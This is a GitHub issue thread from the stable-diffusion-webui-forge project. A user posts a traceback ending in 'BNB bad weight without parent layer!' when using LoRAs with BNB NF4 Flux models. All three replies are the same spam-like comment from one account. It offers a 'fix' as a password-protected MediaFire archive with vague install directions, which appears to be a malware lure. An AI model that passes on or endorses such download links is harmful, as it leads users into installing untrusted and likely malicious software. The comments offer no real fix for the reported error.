### ISSUE TITLE
LORAS give errors on BNB NF4 dev and schnell models, but not on regular fp8 dev. WHY?

### ISSUE THREAD

**Issue by LIQUIDMIND111** [lllyasviel/stable-diffusion-webui-forge#1609]
Traceback (most recent call last):
  File "C:\TEMP\FORGEFLUX\webui\modules_forge\main_thread.py", line 30, in work
    self.result = self.func(*self.args, **self.kwargs)
  File "C:\TEMP\FORGEFLUX\webui\modules\txt2img.py", line 110, in txt2img_function
    processed = processing.process_images(p)
  File "C:\TEMP\FORGEFLUX\webui\modules\processing.py", line 809, in process_images
    res = process_images_inner(p)
  File "C:\TEMP\FORGEFLUX\webui\modules\processing.py", line 952, in process_images_inner
    samples_ddim = p.sample(conditioning=p.c, unconditional_conditioning=p.uc, seeds=p.seeds, subseeds=p.subseeds, subseed_strength=p.subseed_strength, prompts=p.prompts)
  File "C:\TEMP\FORGEFLUX\webui\modules\processing.py", line 1323, in sample
    samples = self.sampler.sample(self, x, conditioning, unconditional_conditioning, image_conditioning=self.txt2img_image_conditioning(x))
  File "C:\TEMP\FORGEFLUX\webui\modules\sd_samplers_kdiffusion.py", line 194, in sample
    sampling_prepare(self.model_wrap.inner_model.forge_objects.unet, x=x)
  File "C:\TEMP\FORGEFLUX\webui\backend\sampling\sampling_function.py", line 356, in sampling_prepare
    memory_management.load_models_gpu(
  File "C:\TEMP\FORGEFLUX\webui\backend\memory_management.py", line 575, in load_models_gpu
    loaded_model.model_load(model_gpu_memory_when_using_cpu_swap)
  File "C:\TEMP\FORGEFLUX\webui\backend\memory_management.py", line 384, in model_load
    raise e
  File "C:\TEMP\FORGEFLUX\webui\backend\memory_management.py", line 380, in model_load
    self.real_model = self.model.forge_patch_model(patch_model_to)
  File "C:\TEMP\FORGEFLUX\webui\backend\patcher\base.py", line 228, in forge_patch_model
    self.lora_loader.refresh(target_device=target_device, offload_device=self.offload_device)
  File "C:\TEMP\FORGEFLUX\webui\backend\patcher\lora.py", line 320, in refresh
    assert weight.module is not None, 'BNB bad weight without parent layer!'

AssertionError: BNB bad weight without parent layer!

BNB bad weight without parent layer!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
